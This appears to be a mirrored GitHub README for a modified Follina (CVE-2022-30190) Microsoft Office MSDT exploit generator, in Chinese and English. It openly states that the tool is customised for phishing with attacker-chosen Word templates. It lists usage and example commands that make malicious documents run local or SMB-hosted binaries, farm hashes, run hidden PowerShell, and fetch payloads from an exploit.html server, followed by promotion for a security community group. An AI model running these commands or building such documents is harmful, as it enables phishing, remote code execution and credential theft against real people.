Giter Site home page Giter Site logo

shenghuo2 / cve-2022-30190-follina-office-msdt-fixed Goto Github PK

View Code? Open in Web Editor NEW

This project forked from komomon/cve-2022-30190-follina-office-msdt-fixed

0.0 0.0 0.0 785 KB

CVE-2022-30190-follina.py-修改版,可以自定义word模板,方便实战中钓鱼使用。

Home Page: https://www.cnblogs.com/forforever/

Python 47.07% HTML 26.44% Smarty 26.49%

cve-2022-30190-follina-office-msdt-fixed's Introduction

'Follina' MS-MSDT n-day Microsoft Office RCE—修改版

根据 https://github.com/chvancooten/follina.py 的项目进行修改,可以自定义指定docx模板文件,便于实战中钓鱼使用,自己编辑好钓鱼word文档后-f参数指定即可。

Usage:

usage: follina.py [-h] -m {binary,command} [-b BINARY] [-f FILE] [-c COMMAND] [-u URL] [-H HOST] [-P PORT]

optional arguments:
  -h, --help            show this help message and exit

Required Arguments:
  -m {binary,command}, --mode {binary,command}
                        Execution mode, can be "binary" to load a (remote) binary, or "command" to run an encoded PS command

Binary Execution Arguments:
  -b BINARY, --binary BINARY
                        The full path of the binary to run. Can be local or remote from an SMB share

Docx file Arguments:
  -f FILE, --file FILE  The docx file

Command Execution Arguments:
  -c COMMAND, --command COMMAND
                        The encoded command to execute in "command" mode

Optional Arguments:
  -u URL, --url URL     The hostname or IP address where the generated document should retrieve your payload, defaults to "localhost"
  -H HOST, --host HOST  The interface for the web server to listen on, defaults to all interfaces (0.0.0.0)
  -P PORT, --port PORT  The port to run the HTTP server on, defaults to 80

Examples:

默认docx muban.docx
# Execute a local binary
python .\follina.py -m binary -b \windows\system32\calc.exe
python .\follina.py -m binary -b \windows\system32\calc.exe -f muban2.docx

# On linux you may have to escape backslashes
python .\follina.py -m binary -b \\windows\\system32\\calc.exe

# Execute a binary from a file share (can be used to farm hashes 👀)
python .\follina.py -m binary -b \\localhost\c$\windows\system32\calc.exe

# Execute an arbitrary powershell command
python .\follina.py -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echo owned > c:\users\public\owned.txt'"

# Run the web server on the default interface (all interfaces, 0.0.0.0), but tell the malicious document to retrieve it at http://1.2.3.4/exploit.html
python .\follina.py -m binary -b \windows\system32\calc.exe -u 1.2.3.4

# Only run the webserver on localhost, on port 8080 instead of 80
python .\follina.py -m binary -b \windows\system32\calc.exe -H 127.0.0.1 -P 8080

image-20220602201236509

image-20220602201350939

一起交流

感兴趣的可以关注 Z2O安全攻防 公众号回复“加群”,添加Z2OBot 小K自动拉你加入Z2O安全攻防交流群分享更多好东西。

image-20220427110933992

公众号

Z2O安全攻防交流群群聊qq二维码

团队建立了知识星球,不定时更新最新漏洞复现,手把手教你,同时不定时更新POC、内外网渗透测试*操作。感兴趣的可以加一下。

image-20220427111016139

图片

图片

微信图片_20220427110850

欢迎star:star: O(∩_∩)O

cve-2022-30190-follina-office-msdt-fixed's People

Contributors

komomon avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.